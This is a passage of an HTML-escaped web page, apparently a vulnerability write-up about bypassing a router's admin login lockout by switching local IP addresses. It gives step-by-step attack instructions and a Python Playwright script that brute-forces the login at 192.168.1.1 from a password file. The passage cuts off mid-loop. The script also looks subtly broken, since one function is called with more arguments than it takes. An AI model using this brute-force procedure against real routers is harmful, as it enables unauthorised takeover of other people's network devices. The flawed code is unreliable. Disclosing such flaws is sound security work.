&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;/p&amp;gt;An attacker connected to the LAN can simply change their local IP address (e.g., from 192.168.1.10 to 192.168.1.11) after reaching the limit, effectively resetting the login attempt counter. &amp;lt;/br&amp;gt; This allows a brute-force attack to be performed against the admin login page, completely defeating the intended security mechanism.
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ol&amp;gt;
  &amp;lt;li&amp;gt;
    Connect to the same local network as the router (default gateway: &amp;lt;code&amp;gt;192.168.1.1&amp;lt;/code&amp;gt;) to prepare the attack environment.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    Start brute-force login attempts by sending requests with different password values. After a few failures, the router will block further attempts from that IP address.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    To bypass the block, change your device’s IP address to another one within the allowed range, then continue the brute-force process from the new IP.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    Repeat this process—each time your IP is blocked, switch to another IP between &amp;lt;code&amp;gt;192.168.1.4&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;192.168.1.254&amp;lt;/code&amp;gt; and resume the attack.
  &amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;exploit-code&amp;#34;&amp;gt;Exploit Code:
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;23
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-python&amp;#34; data-lang=&amp;#34;python&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;import&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nn&amp;#34;&amp;gt;time&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;from&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nn&amp;#34;&amp;gt;playwright.sync_api&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;import&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;sync_playwright&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;def&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nf&amp;#34;&amp;gt;carrega_senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;caminho_arquivo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;str&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;list&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;str&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;]:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;with&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;open&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;caminho_arquivo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;r&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;encoding&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;utf-8&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;as&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;return&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;linha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;strip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;for&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;linha&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;linha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;strip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()]&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;def&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nf&amp;#34;&amp;gt;tenta_login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;str&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;bool&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;goto&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://192.168.1.1/&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_role&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;textbox&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Senha de Login&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_role&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;textbox&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Senha de Login&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;press&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Enter&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;time&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;sleep&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;try&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Avançado&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;exact&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;True&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;timeout&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2000&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;return&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;True&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;except&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;return&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;False&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;def&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nf&amp;#34;&amp;gt;run&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;None&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;browser&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;chromium&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;launch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headless&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;False&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;context&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;browser&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;new_context&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;context&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;new_page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senhas&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;carrega_senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;senhas.txt&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;for&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;idx&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;enumerate&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;):&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;idx&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;len&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;] Testando senha: &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;!r}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tenta_login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;):&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;gt;&amp;amp;gt; Sucesso! Senha encontrada: &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;!r}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
